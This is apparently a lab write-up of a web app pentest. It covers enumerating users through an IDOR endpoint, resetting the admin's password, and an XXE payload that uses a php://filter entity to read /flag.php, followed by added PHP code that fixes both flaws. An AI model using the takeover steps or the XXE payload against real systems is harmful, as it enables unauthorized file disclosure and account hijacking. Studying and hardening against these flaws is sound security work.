Scenario:
Performing a web app pentest for a software company, tasked with testing the latest version of their social network web app. Try to escalate your privileges and exploit different vulnerabilities to read the flag at '/flag.php'.
94.237.53.52:5948
Write up:
Enumeration in Caido
- Log in to the app with the credentials:
- User: htb-student
- Password: Academy_student!
- Login requests in Caido:
- 301 redirect response following a successful login.
- 200 OK response
- API GET request
- Potential IDOR:
We'll focus on the endpoint /api.php/user/74

Then we can enumerate the users through that endpoint and find the admin user. We can change the admin's password via /reset.php.
Now we can log in as the admin user ---> PWD
4. Exploit with the php://filter wrapper (XXE)
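The IDOR above works because /api.php/user/{id} and /reset.php act on whatever id the client supplies. Below is an added example of the object-level authorization check that closes it; it is not code from the target app or from the writeup. The function names (canViewUser, handleUserApi, handleResetPassword) and the in-memory $users table are assumed placeholders for the app's own session and storage layer, which the writeup does not show.

```php
<?php
// Added example: object-level authorization for /api.php/user/{id} and /reset.php.
// All names below are assumptions; the target app's real code is not on the page.

function canViewUser(array $requester, int $targetId): bool
{
    // The id in the URL is never trusted on its own: the caller must own the
    // record or hold an explicit admin role taken from the server-side session.
    return $requester['id'] === $targetId || $requester['role'] === 'admin';
}

function canResetPassword(array $requester, int $targetId): bool
{
    // Stricter than viewing: a password reset is only allowed on your own account.
    return $requester['id'] === $targetId;
}

function handleUserApi(array $requester, int $targetId, callable $findUser): array
{
    // Same 404 for "not yours" and "does not exist", so the endpoint cannot be
    // walked id by id to list valid accounts (the enumeration step in the writeup).
    if (!canViewUser($requester, $targetId)) {
        return ['status' => 404, 'body' => ['error' => 'not found']];
    }
    $user = $findUser($targetId);
    if ($user === null) {
        return ['status' => 404, 'body' => ['error' => 'not found']];
    }
    // Return a projection only: no password hashes, roles or reset tokens in the body.
    return ['status' => 200, 'body' => ['id' => $user['id'], 'username' => $user['username']]];
}

function handleResetPassword(array $requester, int $targetId, string $current, string $new, array &$users): array
{
    if (!canResetPassword($requester, $targetId) || !isset($users[$targetId])) {
        return ['status' => 404, 'body' => ['error' => 'not found']];
    }
    // Re-authenticate with the current password before accepting the change.
    if (!password_verify($current, $users[$targetId]['password_hash'])) {
        return ['status' => 403, 'body' => ['error' => 'forbidden']];
    }
    $users[$targetId]['password_hash'] = password_hash($new, PASSWORD_DEFAULT);
    return ['status' => 204, 'body' => []];
}

// Constructed sample data standing in for the app's database (ids and roles are made up).
$users = [
    74 => ['id' => 74, 'username' => 'htb-student', 'role' => 'user',
           'password_hash' => password_hash('Academy_student!', PASSWORD_DEFAULT)],
    1  => ['id' => 1,  'username' => 'admin',       'role' => 'admin',
           'password_hash' => password_hash('constructed-admin-password', PASSWORD_DEFAULT)],
];
$find = fn(int $id) => $users[$id] ?? null;

$student = $users[74];
var_dump(handleUserApi($student, 74, $find));                          // own record: allowed
var_dump(handleUserApi($student, 1, $find));                           // admin's record: 404
var_dump(handleResetPassword($student, 1, 'anything', 'pwned', $users)); // reset on admin: 404
```

The point of the two 404 branches is that a low-privileged user probing ids gets an identical response whether the id is someone else's or unused, and the reset path additionally demands the current password, so knowing an id is no longer enough to take over the account.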
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY Test SYSTEM "php://filter/convert.base64-encode/resource=/flag.php">]>
<root>
<name>&Test;</name>
<details>test</details>
<date></date>
</root>
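The payload above only works if the server lets libxml resolve the external entity. As an added example, not code from the writeup or the target app, here is a hardened handler for the same <root><name/><details/><date/> document that refuses any DTD before parsing and never enables entity substitution. The function name parseEmailXml is an assumption; the real endpoint that consumes this XML is not shown on the page.

```php
<?php
// Added example: hardened parsing of the XML document the payload targets.
// Assumed function name; the target app's real handler is not on the page.

function parseEmailXml(string $xml): ?array
{
    // 1. Refuse any document carrying a DTD. The payload needs <!DOCTYPE ... <!ENTITY ...>
    //    to declare &Test;, so rejecting DTDs up front stops both external-entity and
    //    parameter-entity variants before libxml ever sees them.
    if (preg_match('/<!DOCTYPE|<!ENTITY/i', $xml)) {
        return null;
    }

    $prev = libxml_use_internal_errors(true);
    $dom  = new DOMDocument();
    // 2. Do not pass LIBXML_NOENT or LIBXML_DTDLOAD. NOENT is the flag that makes libxml
    //    substitute entities, i.e. open php://filter/... and inline the result.
    //    LIBXML_NONET additionally forbids any network fetch during the parse.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    if (!$ok || $dom->documentElement === null || $dom->documentElement->tagName !== 'root') {
        return null;
    }

    // 3. Read only the expected fields as plain text; nothing else in the document is used.
    $out = [];
    foreach (['name', 'details', 'date'] as $field) {
        $node = $dom->getElementsByTagName($field)->item(0);
        $out[$field] = $node ? trim($node->textContent) : '';
    }
    return $out;
}

// Constructed inputs: a benign document and the writeup's payload.
$benign = '<?xml version="1.0"?><root><name>alice</name><details>hi</details><date>2024-01-01</date></root>';
$xxe    = '<?xml version="1.0"?><!DOCTYPE email [<!ENTITY Test SYSTEM '
        . '"php://filter/convert.base64-encode/resource=/flag.php">]>'
        . '<root><name>&Test;</name><details>test</details><date></date></root>';

var_dump(parseEmailXml($benign));
var_dump(parseEmailXml($xxe));
```

The benign document parses to the three fields, while the payload is rejected at step 1 and returns null. Rejecting the DTD is the check to rely on: it does not depend on which libxml version or PHP default happens to govern entity loading, whereas merely omitting LIBXML_NOENT leaves the outcome to the parser's configuration.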

